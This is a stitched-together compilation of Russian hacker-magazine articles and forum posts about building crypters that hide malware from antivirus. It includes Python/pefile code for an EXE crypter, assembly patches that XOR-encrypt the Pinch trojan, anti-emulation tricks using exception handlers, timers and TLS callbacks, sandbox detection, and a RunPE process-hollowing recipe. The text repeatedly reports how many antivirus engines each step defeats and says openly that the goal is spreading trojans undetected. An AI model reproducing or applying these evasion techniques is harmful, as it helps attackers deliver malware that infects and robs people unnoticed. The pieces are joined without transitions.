Ну, антивирус, погоди! Создаем EXE-криптор на Python’е — «Хакер»

Содержание статьи

Web мы спасли от антивирусов несколько месяцев назад. Это было нетрудно — область относительно новая, не освоенная. С исполнимыми же файлами антивирусы борются уже десятилетиями. Побороть EXE-модуль будет сложнее, но… мы справимся :).

 

Выпуск 1. Ознакомительный

Ты уже знаешь, что я считаю антивирусы абсолютно бесполезными — хотя бы по той причине, что они помогают только от самых примитивных зверьков, которые в условиях современного денежного малварьбизнеса встречаются не так часто. Современные злокодеры, подогретые денежными вливаниями, научились программировать довольно жестко, но есть у них одна маленькая проблема — криптовка — достаточно сложная штука, для написания которой нужны глубокие знания PE-формата, ассемблера и системного программирования. Из-за высокого «входного барьера» в этой области мало профессионалов. И найти хорошего криптора ой как сложно. Но решение проблемы есть! Как мы знаем, антивирусные компании обмениваются технической информацией и создают специальные ресурсы, посредством которых мы сами отсылаем им сэмплы (типа VirusTotal’а). Но ведь и вирмейкеры тоже могут обмениваться информацией! Необязательно палить приватные мазы — публичные технологии тоже сгодятся. Например, было бы круто, если бы в каком-то одном месте лежали функции для генерации PE-файла, генерации импорта, шифрования ресурсов, рабочие функции определения SandBox’ов, тогда мы могли бы создавать крипторы так же непринужденно, как домики из кубиков Лего. Идеальным местом для обмена, наверное, будет GitHub, и туда я залью исходники написанного нами сегодня криптора — он будет доступен по адресу http://github.com/presidentua/ExePacker. Кроме того, в решении проблемы здорово помогло бы использование высокоуровневых языков программирования. В паблике сейчас валяются исходники крипторов на С++ или VisualBasic’е, но ведь от этого проще не становится, поскольку разобраться в написанном коде — ой как непросто. На Python’е все выглядит в разы лучше, поэтому именно его мы сегодня и будем использовать. В общем, заложим фундамент этой благородной миссии. Присоединяйся!

(adsbygoogle = window.adsbygoogle || []).push({});  

Выпуск 2. PE-файл

Структура PE-файла довольно сложная, поэтому подробная документация будет ждать тебя на диске, а здесь я представлю твоему вниманию лишь избранные моменты. PE-файл представляет набор разных служебных структур, связанных между собой, и набор данных, которые размещены в секторах. Загрузчик Windows’a читает структуры, обрабатывает их (например, импортирует DLL’ки) и потом передает управление на инструкцию, указанную в поле «Entry Point». Теперь посмотрим, что же нужно нам сделать, чтобы изменить файл и при этом не испортить его.

 

Выпуск 3. Теоретический криптор

Для начала выберем файл, который будет у нас исполнять функции лабораторной мыши. Чтобы сделать приятное Андрюшку :), мы, пожалуй, будем издеваться над Putty.exe. Упрощенно его структура будет выглядеть так:
  1. Служебные данные
  2. Первая кодовая секция
  3. Другие секции с данными
Алгоритм криптора следующий. Создать две ассемблерные программы. Первая будет косить под обычную прогу и проверять, что мы не в эмуляторе, а потом передаст управление на вторую программу. Вторая же восстановит оригинальную структуру файла и передаст управление на оригинальную точку входа Putty. И записать эти программы в файл. В результате получится следующая структура:
  1. Служебные данные
  2. Первая кодовая секция
    1. Наша первая программа, которая передаст управление на 4.2
    2. Шифрованный код первой секции
  3. Другие секции с данными
  4. Добавленная секция
    1. Часть кодовой секции, перезаписанной программой 2.1
    2. Вторая программа, которая оригинальный код из 4.1 поместит на 2.1, а потом расшифрует кодовую секцию и передаст на нее управление.

 

Выпуск 4. Практический криптор

Ну наконец-то мы добрались до сердца нашей статьи. Для работы криптора нам понадобится модуль pefile (будем использовать несколько модифицированную версию), и с помощью либы откроем Putty: import pefile pe = pefile.PE("putty.exe") Теперь, если ты напишешь «print pe», то увидишь подробную инфу обо всех характеристиках файла, по этой инфе я советую искать нужные для изменения поля в файле. А о внутренней работе модуля обязательно прочитай во врезке. Теперь немного математики. У нас будут две программы, которые нужно внедрить в файл. Они будут занимать где-то по 512 байт каждая максимум. Поэтому для размещения добавим новую секцию в 1024 килобайт вызовом: pe.add_last_section(size=1024) Закриптуем первую секцию XOR’ом с ключом «1»: pe.sections[0].xor_data(code=1)
Магия, правда? :). А теперь прикинь, что все это пришлось бы писать на С++! Поскольку в начале программы будет наш код, то сохраним оригинальный код, скопировав его в последнюю секцию. Адрес первой секции в файле находится в переменной — pe.sections[0]. PointerToRawData, а последней, соответственно — в pe.sections[-1].PointerToRawData: pe.data_copy(pe.sections[0].PointerToRawData, pe.sections[-1].PointerToRawData, 512) Оригинальный код сохранен, и мы приступим к написанию первой программы. Конечно же, писать мы ее будем на ассемблере, используя FASM для компиляции. Создадим файлик pack.tpl.asm с содержанием: use32 mov eax, {{ go }} jmp eax Ты, наверное, уже догадался, что это не готовый исходник, это лишь шаблон для шаблонизатора из TornadoWeb, а его мы уже отлично знаем, ведь именно его мы использовали при написании HTML-морфера. Сгенерируем первую программу: asm = Template(open("pack.tpl.asm", "r").read()).generate( go=pe.OPTIONAL_HEADER.ImageBase + pe.sections[-1].VirtualAddress+512, ) with open("pack.asm", "w") as f: f.write(asm) os.system(r"c:fasmwFASM.EXE pack.asm")
В переменной go мы передаем адрес в памяти, где будет наша вторая программа — то есть, в последней секции, начиная с 512 байта. А в последней строчке компилим результат на FASM’е. Теперь запишем получившийся код в начало первой секции: new_pack = open("pack.bin", "rb").read() pe.data_replace(offset=pe.sections[0].PointerToRawData, new_data=new_pack) Вторую программу запишем в файл copy.tpl.asm. Размер у нее более внушительный, поэтому полный код смотри на диске. Там содержится два цикла, один скопирует 512 байт оригинальной программы с последней секции в первую, а второй цикл расшифрует всю первую секцию. После этого передается управление на оригинальную программу. При компиляции темплейта нужно передать туда параметры для циклов копирования и расшифровки:
copy_from = pe.OPTIONAL_HEADER.ImageBase+pe.sections[-1].VirtualAddress copy_to = pe.OPTIONAL_HEADER.ImageBase+pe.sections[0].VirtualAddress oep = pe.OPTIONAL_HEADER.ImageBase+pe.OPTIONAL_HEADER.AddressOfEntryPoint asm = Template(open("copy.tpl.asm", "r").read()).generate( copy_from=copy_from, copy_to=copy_to, copy_len=512, xor_len=pe.sections[0].Misc_VirtualSize, key_encode=1, original_oep=oep,)
Остался маленький штришок — записать вторую прогу в файл и сделать первую секцию записываемой, чтобы расшифровщик не выдавал ошибок, а также установить точку входа на начало первой секции: new_copy = open("copy.bin", "rb").read() pe.data_replace(offset=pe.sections[-1].PointerToRawData+512, new_data=new_copy) pe.sections[0].Characteristics |= pefi le.SECTION_CHARACTERISTICS["IMAGE_SCN_MEM_WRITE"] pe.OPTIONAL_HEADER.AddressOfEntryPoint = pe.sections[0].VirtualAddress pe.write(fi lename="result.exe")

 

Выпуск 5. Завершающий

Если собрать кусочки кода вместе, то будет у нас всего 50 строк. Всего лишь 50 — и криптор готов! А теперь прикинь, сколько строк содержала бы программа на С? Конечно, это еще далеко не готовый продукт, над ним нужно работать и работать. Чтобы довести систему до реального криптора, нужно добавить как минимум шифрование ресурсов и импорта, а также антиэмуляцию. О том как теоретически эти проблемы решить, смотри во врезках. Удачи!

 

Желательный функционал 1. Обход песочниц

В крипторе нужно делать проверки на запуск в виртуальной машине, SandBox’е или анализаторе типа анубиса. Чтобы их зедетектить, нужно провести небольшое исследование и написать программу, которая будет на экран выводить разные внутренние параметры системы, а дальше — проверить этот файл на том же анубисе и в скриншоте посмотреть параметры, которые показала наша прога. Дальше все просто — при запуске на системе с подобными параметрами — просто уходим в цикл.

 

Обязательный функционал 2. Шифрование ресурсов и импорта

Для шифрования ресурсов мы должны пройтись по секции ресурсов и сохранить оттуда важные для запуска файла — иконки и манифест. Дальше создаем новые ресурсы с важными ресурсами, а остальное шифруем. После запуска криптора восстанавливаем все обратно. Несколько сложнее получается с импортом, ведь его также нужно сначала зашифровать, потом сгенерировать липовый импорт, но после восстановления импорт еще нужно вручную проинициализировать, то есть — загрузить DLL’ки и сохранить в таблицу импорта реальные указатели на функции.

 

Обязательный функционал 1. АнтиЭмуляция

Кроме избавления от внешних сигнатур, очень важно, чтобы антивирус в своем эмуляторе не добрался до исходного файла. Для этого нужна антиэмуляция. Раньше были очень популярны приемы, основанные на предположении, что эмулятор не понимает все инструкции процессора. Сейчас же ситуация изменилась, и самые эффективные приемы основаны на использовании Windows API. Согласись, что антивирус вряд ли сможет эмулировать все API. Вот тебе такая идейка для реализации:
  • создаем Windows-приложение и один дополнительный поток;
  • после создания потока он должен послать через API сообщение основному потоку с каким-то ключом;
  • в главной программе проверяем, и если ключ правильный — передаем управление на код расшифровки основного файла;
  • если код неправильный, то просто ничего не делаем и находимся в вечном цикле получения сообщений от Windows.
PS:Никогда не останавливай программу с ошибкой, это лишь прибавит криптору лишний вес. Вечный цикл получения сообщений от Windows — лучший способ.

 

Внутренности Антивирусов

В упрощенном виде, антивирус — это набор правил (сигнатур) и система, которая проверяет файл по этим правилам. К примеру, пусть в антивирусе будут такие сигнатуры:
  • секция с кодом, записываемая +10;
  • после запуска прописывается в авторан +30;
  • вторая секция с именем Zeus +30;
  • меньше 4 энтропия кодовой секции +20;
  • есть сертификат от майкрософта -10.
Дальше антивирь проверяет те правила, которые возможно проверить без запуска EXE, потом в эмуляторе запускает файл и проверяет все остальные правила. А после этого подсчитывает сумму, если она больше 100, значит вирус, если меньше — значит не вирус.

 

Как работает pefile

При загрузке в pefile экзэхи, библиотека сохраняет сам файл в pe.data, а потом обрабатывает его и создает массив структур pe.
structures
. Структура — это объект, у которого есть адрес. Адрес, по которому она находится в файле, и есть набор полей. При сохранении файла pe.write(filename=»result. exe») либа проходит по всем структурам и сохраняет их по указанным адресам. Чтобы что-то добавить, например, в ту же секцию, нам сначала нужно найти адрес в памяти. Это можно посчитать так: адрес в памяти последней секции + размер секции. Дальше заполняем все поля в структуре и добавляем ее в массив pe.structures. Вот и все :).

 

Links

Малварь как искусство — Как написать криптор. Часть — 1. Разрабатываем алгоритм

Интересно как сейчас аверы реагируют на крипторы ?

Немножко для тех-кто в «танке»:

1)Конструктор(Bulder) – Будет криптовать наш вирус, запихивать его в конец стаба, в общем-то и вся задача конструктора, имеет как-правило GUI — интерфейс, для упрощения создания «обработанного вируса»!

2)Стаб(Stub) – Это наши «Мозги», он расшифровывает вирус и запускает его в памяти. Часто в стабе реализованны различные приёмы антиотладки, антиэмуляции. В идеале хорошо, если в каждом новом билде «обработанного вируса» был-бы изменённый стаб.

Сделать это можно, например если в креаторе использовать «Генератор мусора — В стаб добавляются не влияющие на исполнение и поведение программы инструкции, либо генерируется немного изменённый код стаба в каждом билде».

Ещё рекомендую прочесть, кто в «танке»:Ещё раз про джойнеры, крипторы, стабы и прочую хрень

А теперь основная часть поста:

Кто-нить знает, что будет, если сделать так, методология простого криптора:

Берём вирус, который детектят 64/64, далее конструктором (Тупо форма или консоль) считываем его как массив байт кодов, получится массив байт, далее шифруем его, пусть простой алгос шифрования (Например XOR) c ключом А.

Ключь А — Это у нас будет результат какой-то функции, ну или например можно сделать алгоритм получения нашего ключа в стабе (Пример ниже по тексту).

Далее это всё дело запихиваем в стаб, либо ниже стаба, либо в ресурсы, даже незнаю что лучше ?

Далее если идёт запуск стаба, мы проверяем следующее:

1) Запустил-ли юзер вирус, или используется виртуалка:

Сделать это можно например так (самое простое), например поставить хук на клавиатуру и в бесконечном цикле ждать пока кто-то не нажмёт клавишу, или не шивильнёт мышку, или не нажмёт на клавишу мышки, если событие произошло, значит мы не-под виртуалкой, идём в шаг 2)

2)Шаг два нужно получить наш ключ расшифровки, как это сделать ?

Самое простое, написать простую функцию например, то-что делается выше, если мы под виртуалкой аверов, то будем генерировать число 0xAA, а если мы не под виртуалкой, то сгенерим 0x55 (0x55 и будет наш ключ расшифровки).

Можно в качестве ключа использовать значение какой-то API, главное что-бы не было заметно что-это ключ ! 🙂

3)Третий шаг, считываем из ресурсов, или то-что ниже стаба, наш шифрованный массив байт.

4)Четвёртый шаг, расшифровываем его, с тем-же ключом (XOR обратный алгос шифрование, что-бы расшифровать, нужно проделать то-же, что и при шифровании с тем-же ключом :)).

5)Далее самое интересное и сложное, нужно запустить вирус в памяти, есть уже готовые функции и методы, на разных языках, но смысл везде примерно такой:

Нужно «порадить новый процесс», как это сделать:

— Например при помощи API — винды CreateProcess, создать процесс;

— Выделить для него память, при помощи VirtualAllocEx;

— Записываем наш расшифрованный вирус (Расшифрованный массив байт) в выделенную область памяти при помощи WriteProcessMemory.

— Далее нужно установить контектс потока, при помощи SetThreadContext и запустить его при помощи ResumeThread.

Вообще это всё реализовано, практически в любом исходнике криптора, пример тут PE-Crypter/runPE.h at master · jozemberi/PE-Crypter · GitHub или на хабре даже есть: Запуск программы из памяти / Песочница / Хабрахабр

Или у нас на Делфи:ВАЖНО — Делаем криптор вместе

Вот вам и алгоритм простого криптора, НО без антиэмуляции, в качестве антиэмуляции тут «Проверка на запуск под виртуальной машины АВ, и-то примитив», понятно что для уменьшения детекта, процедуру расшифровки и запуска в памяти нужно как-то маскировать, что-бы антивирусный сканер до неё не добрался ! 🙂

Кто-нить использовал это, как современные антивирусы реагируют на такое ?

Если не будет лень и время, то следующая часть реализация этого всего на Visual C++, плюс продумать методы антиэмуляции и генерации ключа, отписывайтесь если есть что сказать ? 🙂

Профессиональные приемы обхода антивирусов — «Хакер»

Содержание статьи

Странно осознавать, что многие люди, создающие трояны, вирусы или использующие готовые решения-генераторы, нередко обращаются к услугам создателей «приватных крипторов», нередко оказывающихся обычными поделками студентов, обладающих весьма посредственными знаниями в области вирусмейкинга, имеющих слабое представление о структуре PE-файлов. Такой продукт может стоить десятки или даже сотни долларов, но при этом не обеспечивать даже минимальной защиты от разнообразных механизмов обнаружения вредоносных программ. А ведь достаточно легко самостоятельно спрятать троян от назойливых антивирусов, даже таких известных, как NOD и Dr. Web. И совершенно бесплатно! Как? Читай ниже!

 

Подготовка к исследованиям

Перед тем, как приступить к работе, давай определимся с арсеналом инструментов. Во-первых, криптовать будем давным-давно известный всем антивирусам Pinch (я намерено выбрал именно этот троян для исследований, поскольку билдеры для его построения и описание его конфигурации легко найти в Сети). В статье я опущу моменты, связанные с генерацией тела программы и созданием веб-админки для проверки работоспособности пинча (все необходимое для экспериментов, в том числе и руководства, ты можешь найти в зашифрованном RAR-архиве на нашем DVD). Один из главных инструментов исследователя вирусов – виртуальная машина VMWare с установленной Windows XP (данное требование необязательно, однако очень желательно не экспериментировать с вредоносным ПО на собственной машине). Кроме прочего, нам понадобятся отладчик OllyDbg, редактор WinHex, утилита для работы с PE-файлами LordPE. Ну и, разумеется, virustotal.com для тестов. Да, там сидят аналитики, и пользоваться услугами этого сайта для создания «невидимого» вируса – сущее безумие, однако в наши планы не входит нарушение закона. Мы – исследователи, поэтому пусть высоколобые реверсеры копаются в нашем коде на здоровье и работают над улучшением собственных продуктов. Остальное – по вкусу и в зависимости от личных предпочтений. Итак, задраиваем люки и погружаемся в отладку. Будет интересно!

 

Прячем код

Сначала обратимся к тривиальным и давно известным нам методам сокрытия кода – шифровке секции по константе. В своих статьях я уже не раз обращался к подобному коду. Удивительно, но простой XOR машинных кодов, находящихся в секции кода, позволяет избавиться от внимания аж четверти антивирусных программ! Итак, откроем сгенерированный файл пинча (pinch.exe) в отладчике. Точка входа по умолчанию равна 13147810. По адресу 13147C26 начинается поле сплошных нулей, оставленное компилятором для выравнивания секции. Нам это на руку – здесь мы будем размещать наш код. Итак, взгляни на вид криптора: 13147C30 PUSHAD 13147C31 MOV ECX,6C2F 13147C36 MOV EDX,DWORD PTR DS:[ECX+13141000] 13147C3C XOR EDX,76 13147C3F MOV DWORD PTR DS:[ECX+13141000],EDX 13147C45 LOOPD SHORT pinch_pa.13147C36 13147C47 POPAD 13147C48 JMP SHORT pinch_pa.13147810 Вносим изменения в файл программы (меню правой кнопки мыши, «copy to executable-all modifications», в появившемся окне выбери из меню правой кнопки пункт «Save file»). После того, как изменения внесены, идем в LordPE, изменяем точку входа в программу на новую (новое значение OEP равно 13147C30, именно здесь и обосновался наш код) и сохраняем программу. Но и это еще не все; снова открываем программу в OllyDbg, выполняем код, внесенный нами (для этого ты можешь установить точку останова по адресу 13147C48 и выполнить программу, нажав Shift+F9). Таким образом, наш набор инструкций шифрует 6C2F байт. Теперь программу необходимо снова сохранить. Готово! Мы получили вполне работоспособный зашифрованный пинч. Идем на virustotal.com, загружаем файл и дожидаемся результатов анализа. Удивительно, но только 31 из 43 антивирусов распознали вредоносный код (на незашифрованный пинч «ругаются» почти все – 42 из 43)! Двигаемся дальше. Продолжим наш эксперимент. Попробуем использовать механизм создания собственного обработчика исключений для выполнения одного из приемов, описанных мной на страницах журнала ранее. Поскольку метод «разжеван», мы лишь адаптируем код для нашего случая, его функциональность полностью раскрывается в комментариях (если что-то все-таки осталось неясным, отправляю тебя к рубрике «Антиотладочные приемы» за октябрь 2009 года). 13147C4B XOR EAX,EAX; обнуляем регистр 13147C4D PUSH pinch_pa.13147C62; помещение адреса нового обработчика в стек 13147C52 PUSH DWORD PTR FS:[EAX]; помещение адреса старого обработчика в стек 13147C55 MOV DWORD PTR FS:[EAX],ESP; помещение в FS:[0] указателя на структуру 13147C58 CALL pinch_pa.13147C58; генерация исключения путем переполнения стека 13147C5D JMP pinch_pa.13145555; данная инструкция никогда не будет исполнена 13147C62 POP EAX; восстановление регистров 13147C63 POP EAX 13147C64 POP ESP 13147C65 JMP pinch_pa.13147810; переход к выполнению программы Кратко описать функционал кода можно следующим образом: мы создаем новый обработчик исключений и размещаем его по адресу 13147C62. Эмуляторы кода, которые неспособны должным образом определить логику выполнения программы, полагают, что вслед за бесконечной рекурсией по адресу 13147C58 произойдет передача управления на следующую инструкцию (JMP pinch_pa.13145555), в результате чего направляют дальнейшее исследование логики выполнения кода по неверному пути. На самом же деле, стек переполняется, вызывается исключение, а программа благополучно продолжает свою работу. Действуя таким образом, мы отметаем еще четыре антивируса (только 27 из 43 утилит справились с задачей и распознали вредоносный код). Итак, мы отправили на прогулку лесом едва ли не половину антивирусов – что же дальше? Теперь мы займемся более изощренными способами антиотладки и простейшей антиэмуляции.

 

Продолжаем эксперимент

Возможно, многим покажется, что описанного выше уже достаточно, чтобы успешно распространять троянские программы, ведь шансы быть обнаруженными мы сократили вдвое. Это верно, однако мы отсекли лишь самые убогие антивирусы, которые совершенно не отвечают требованиям времени. В ходе экспериментов я выяснил, что и с мощной эмуляцией кода можно справиться, причем достаточно легко! Для разминки, вставим в подопытный пинч несколько небольших кусков кода, которые «закроют глаза» нескольким антивирусам (а заодно и многим реверсерам низкой квалификации). По адресу 13147C90 я разместил криптор, аналогичный вышеописанному, который шифрует написанный нами антиотладочный код (4Ch байт, начиная с адреса 13147C30). На диске ты найдешь его код, здесь же его привести не позволяет объем статьи. Таким образом, мы скрыли от некоторых эвристических механизмов некоторые детали нашего механизма, усложнив работу необходимостью многоступенчатой распаковки. 13147C90 - NEW OEP length of code 4c 13147c30 - start of code 13147c7c -end of code 13147C90 60 PUSHAD 13147C91 B9 4C000000 MOV ECX,4C 13147C96 8B91 307C1413 MOV EDX,DWORD PTR DS:[ECX+13147C30] 13147C9C 83F2 54 XOR EDX,54 13147C9F 8991 307C1413 MOV DWORD PTR DS:[ECX+13147C30],EDX 13147CA5 ^E2 EF LOOPD SHORT kadabra_.13147C96 13147CA7 61 POPAD jmp 13147c30 Существует очень любопытный прием, который дает очень хороший эффект, вводящий в ступор некоторые отладчики и антивирусы. Имя ему – обнуление точки входа. Действительно, совсем неправдоподобной выглядит ситуация, когда PE-заголовок, располагающийся по нулевому смещению относительно ImageBase, является одновременно исполняемым кодом. Однако она более чем возможна. Открой отлаживаемый файл в WinHex и взгляни на байты данных, располагающиеся в самом начале файла: 4D 5A 00 00 (да-да, это та самая буквенная сигнатура «MZ», расположенная в начале PE-файла!). Взглянув на этот же PE-заголовок в отладчике (для этого нужно перейти по адресу 13140000h), мы увидим следующую картину: 13140000 4D DEC EBP 13140001 5A POP EDX 13140002 0000 ADD BYTE PTR DS:[EAX],AL 13140004 0100 ADD DWORD PTR DS:[EAX],EAX ... 13140028 0000 ADD BYTE PTR DS:[EAX],AL Кажется, первые две инструкции вполне безобидны и могут быть выполнены без риска «уронить» программу. К сожалению, следом за ними располагается лишь два нулевых байта, а испортить MZ-заголовок, записав межсегментный пятибайтный переход на антиотладочный код, мы не можем. Подумав с полминуты, можно найти верное решение. Взгляни на 13140028. Здесь можно найти гораздо больше пяти нулевых байт. Слон здесь вряд ли поместится, но длинный переход – вполне! Итак, действуем следующим образом: меняем нулевые байты, начиная с адреса 13140002, на следующую инструкцию: 13140002 EB 24 JMP SHORT 13140028 а байты, расположенные по адресу 13140028, на следующий код: 13140028 -E9 637C0000 JMP 13147c90 После выполненных процедур остается лишь сохранить программу, открыть ее на редактирование в LordPE и обнулить поле «EntryPoint». Итак, все работает, и еще два антивируса сдались: теперь лишь 25 из 43 находят в нашем подопытном образце опасный код. Исследования показали, что пинч содержит четыре секции, две из которых – .conf и .data – содержат данные, которые могут быть рассмотрены антивирусами в качестве константы и занесены в сигнатурную базу. Поэтому необходимо зашифровать и их. Для этого полностью убираем код раскриптовки, заменяя его в OllyDbg на нули, и видим, что наш образец все равно палится как пинч! Делаем вывод, что либо антивирусы методом перебора видят наш код, либо проверяют image base. Пробуем изменить Image base – и, действительно, отметаем еще четыре антивируса.

 

Lost in Time, или Dr. Web, не считающий время

Представь ситуацию: мы располагаем тысячей программ, каждая из которых использует 15-секундный таймер. Суммарное время задержки выполнения кода составит, что несложно подсчитать, 15000 секунд, или около четырех часов. Таким образом, если антивирусный алгоритм в своей работе по-настоящему эмулирует таймер, анализ тысячи подобных файлов займет у него вышеуказанное время. Конечно, реальная эмуляция таймеров – нонсенс, и многие алгоритмы просто-напросто нужным образом изменяют регистры или стек контекста процесса, если встречают одну из API-функций, выполняющих задержку выполнения программы. Но все ли антивирусы настолько хороши? Проверим на практике. Попробуем использовать таймер в своих целях, чтобы сравнять с землей эмуляцию кода. Итак, наш план – использовать два замера времени, в промежутке между которыми будет «тикать» таймер. Впоследствии мы используем два временных штампа, чтобы вычислить разность между ними. Разность эта в дальнейшем будет нами использоваться для того, чтобы изменить логику работы защитного механизма. Для того, чтобы засечь время, используем API-функцию GetLocalTime, которая записывает по указанному в стеке адресу следующую 16-байтную структуру: typedef struct _SYSTEMTIME { WORD wYear; // Год WORD wMonth; // Месяц WORD wDayOfWeek; // День недели WORD wDay; // День месяца WORD wHour; // Часы WORD wMinute; // Минуты WORD wSecond; // Секунды WORD wMilliseconds; // Миллисекунды } SYSTEMTIME; Условимся, что для хранения двух структур, полученных в результате пары вызовов GetLocalTime, будем использовать области памяти, начинающиеся, соответственно, с адресов 13147D7D и 13147D94. Функция Sleep(), входящая в Kernel32, инициирует «заморозку» выполнения программы, принимая параметр, выраженный в миллисекундах, через стек. Используя эти условия, напишем следующий код: 13147CFA PUSH kadabra_.13147D7D; записываем в стек первый адрес 13147CFF CALL kernel32.GetLocalTime; получаем первый временной штамп 13147D04 PUSH 3E8; задержка таймера – 1000 миллисекунд, или 1 секунда 13147D09 CALL kernel32.Sleep; запуск таймера 13147D0E PUSH kadabra_.13147D94; записываем в стек второй адрес 13147D13 CALL kernel32.GetLocalTime; получаем второй временной штамп В результате выполнения получаем две 16-байтных заполненных структуры, каждая из которых записана, начиная с адреса, определенного нами выше: [год][месяц][день недели][День месяца] [Часы] [Минуты] [Секунды][Миллисекунды] 13147D7D: DA 07 0A 00 02 00 0C 00 0D 00 0C 00 31 00 B1 03 13147D94: DA 07 0A 00 02 00 0C 00 0D 00 0D 00 04 00 B1 03 Обрати внимание: нас интересуют только значения, соответствующие секундам. Мы заставили программу «спать» ровно 1 секунду, а это значит, что разница между двойными словами, записанными в ячейках [13147d7d+С] и [13147D94+С], не должна быть больше или меньше единицы (в абсолютном большинстве случаев). Этот факт должен помочь нам побороть эмуляторы кода, пропускающие таймеры. Но как использовать полученное значение? Мы посчитаем разницу и используем ее для вычисления адреса перехода. Если эта разница будет посчитана неверно (что означает, что код эмулируется, причем неверно), то выполнение программы полетит ко всем чертям, но это нас не волнует :). Итак, получим приблизительно следующий код: 13147CF9 ;Код получения временных штампов (приведен выше) 13147D18 MOV AL,BYTE PTR DS:[13147D89]; первое значение помещаем в AL 13147D1D MOV AH,BYTE PTR DS:[13147DA0]; второе значение помещаем в AH 13147D23 SUB AH,AL; получаем разность значений 13147D25 XOR EBX,EBX; обнуляем EBX 13147D27 MOV BL,AH; перемещаем разность в EBX 13147D29 ADD EBX,13147C29; вычисляем адрес перехода 13147D2F JMP EBX; переходим по вычисленному адресу Наверное, ты уже догадался, что адрес, который помещается в EBX, должен быть равен 13147C30. Однако, как показывает практика, не все идеально, особенно если речь идет об эмуляции кода. Благодаря несложным манипуляциям мы получаем великолепный результат: эмуляция Dr. Web разваливается на глазах! :). Вместе с ним отступают и еще два антивиря – это не может не радовать нашу душу. Всего 22 из 43 антивирусов продолжают подозревать нашу программу в чем-то нехорошем.

 

Последние штрихи

Когда я писал статью, я заметил, что в веб-интерфейс пинча стали приходить странные однообразные отчеты. Сначала мне показалось, что эти отчеты присланы с виртуальной машины, созданной мной, но потом понял, что это не так: все они были созданы на машинах с различной конфигурацией. В конце концов я понял, что это – результат запусков на машинах экспертов, которые пользуются virustotal’ом для анализа новых угроз. Мои опасения подтвердились, когда я увидел, что количество антивирусов, распознавших в зашифрованном мной файле угрозу, увеличилось, хотя и ненамного. Тогда я решил «обернуть» вокруг защиты, созданной мной, еще один «слой»-пакер, запускаемый из TLS. Для чего? Это позволит усложнить жизнь механизмам, использующим сигнатуры. Кроме того, на месте TLS-функции может быть любой алгоритм, кодирующий произвольный участок файла, что позволяет малыми усилиями полностью изменить содержание файла, скрыв «узнаваемые» места. Мало того, использование callback-функций само по себе является достаточно неплохим средством усложнения защитного механизма. Думаю, что ты читал о TLS (Thread Local Storage)-callback-функциях достаточно (в частности, Крис посвятил TLS отдельную статью, опубликованную в одном из номеров нашего журнала), однако напомню о том, что они собой представляют, опуская описание широчайших возможностей их использования. Callback-функции выполняются непосредственно после инициализации программы загрузчиком, еще до остановки на OEP. Информация обо всех таких функциях содержится в специальной таблице, а адрес таблицы, в свою очередь, извлекается загрузчиком из специального поля PE-заголовка. Попробуем создать таблицу TLS-функций для нашей программы (к написанию кода callback-функции приступим чуть позже). Структура ее, имеющая размер шестнадцати байт, проста. Первые два двойных слова используются для записи адресов начала и конца выделяемой для потока области данных. В качестве этих значений мы выберем два произвольных адреса (13147d80 и 13147d90), лежащих в пределах области выравнивания секции .text, оставленной компилятором. Оставшиеся два DWORD’а – это, соответственно, поле для записи индекса, возвращаемого callback-функцией (13147d96), и адрес таблицы callback-функций (13147da0). Так выглядит код получившейся TLS-таблицы: 80 7d 14 13 90 7d 14 13 96 7d 14 13 a0 7d 14 13. Разместим его по адресу 13147d5d при помощи отладчика (запомним адрес – он нам еще понадобится). Приступим к созданию кода таблицы TLS-функций. Переходим к адресу 13147da0, выделяем 6 байт, выбираем из контекстного меню команду «Binary -> Edit». Вводим значение «13 14 7d b0 00 00». Первые 4 байта указывают на адрес callback-функции. Последние два нулевых байта указывают на окончание таблицы callback-функций. По адресу 13147db0 разместим саму функцию, шифрующую все наши ранее созданные крипторы, а также код по второму кругу: 13147DB0 PUSHAD; сохраняем регистры в стек 13147DB1 MOV ECX,6D2F; устанавливаем счетчик 13147DB6 MOV DH,BYTE PTR DS:[ECX+13141000];помещаем в DH текущий байт секции 13147DBC XOR DH,CL; выполняем логическое сложение с младшим байтом счетчика 13147DBE MOV BYTE PTR DS:[ECX+13141000],DH; помещаем закодированный байт в память 13147DC4 LOOPD SHORT 13147DB6; повторяем цикл 13147DC6 POPAD; восстанавливаем регистры 13147DC7 RETN; возвращаемся из функции Полагаю, ты помнишь, что после внесения кода в файл необходимо выполнить его, чтобы он закодировал инструкции, после чего следует сохранить измененный файл прямо из-под OllyDbg. Последний штрих – внесение сведений о TLS-директории в PE-заголовок. Открываем LordPE и правим в таблице директорий значение TLS Address на 00005d7d (разумеется, это же можно сделать и средствами OllyDbg). Кстати, если ты хочешь отлаживать TLS, чтобы не «пролетать» мимо выполнения callback-функций, нажми в OllyDbg Alt+O и в появившемся меню выбора места, где отладчик будет останавливаться при загрузке программы, укажи «System Breakpoint» (цель этого действия ясна, ведь TLS callback’и выполняются еще до попадания на точку входа!). Проверим закодированный файл на virustotal.com. Нас ждет радостное известие – всего лишь 18 из 43 антивирусов распознают вредоносный код! Итак, на момент тестирования «сдались» такие маститые охотники за червями и малварью, как DrWeb, Panda, NOD32, TrendMicro-HouseCall, VBA32, ViRobot, VirusBuster, Sunbelt 7048, F-Secure, BitDefender, eSafe и многие другие. Я намерено не стал доводить нашу криптовку до победного конца. Придумывай новые методы обмана, внедряй в наш образец и таким образом обманывай новые антивирусы. Удачи в благих делах!

Ещё раз про джойнеры, крипторы, стабы и прочую хрень

Я тут создал новый достаточно серьёзный раздел в хак. категории и сейчас думаю наверное зря, т.к. крипторы которые в паблике быстро устаревают, буквально 2-3 дня и палятся уже всеми антивирусниками и становится уже к сожалению не так интересно, ну и это ещё не самое хреновое, хреново то-что искать новые крипторы здесь опять-таки навряд-ли кто-то будет и тем-более тестить их, может-быть пару человек только…

И как-бы тема не превратилась в унылый и никому не нужный копипаст…
В начале раздел хотел удалить, но потом решил, а почему-бы вместо крипторов не давать теоретический материал, а это различные статьи посвящённые этой проблеме, может-быть какие исходники крипторов, ну в общем инфа больше позновательного характера…

Возможно и это здесь мало кому интересно, но всяко лучше чем копипаст материала с ресурсов…

Итак давайте в начале разберёмся, а что-же такое крипторы, стабы и т.д. и вообще зачем они нужны…

Обо всём по порядку:

1) Что-же такое криптор и стаб и зачем нужно:

Криптор (aka cryptor) — это тулза, которая предназначена для скрытия троянов, ботов и прочей нечисти от детектирования антивирусами. Крипторы можно разделить на 2 вида: хорошие и дерьмовые.

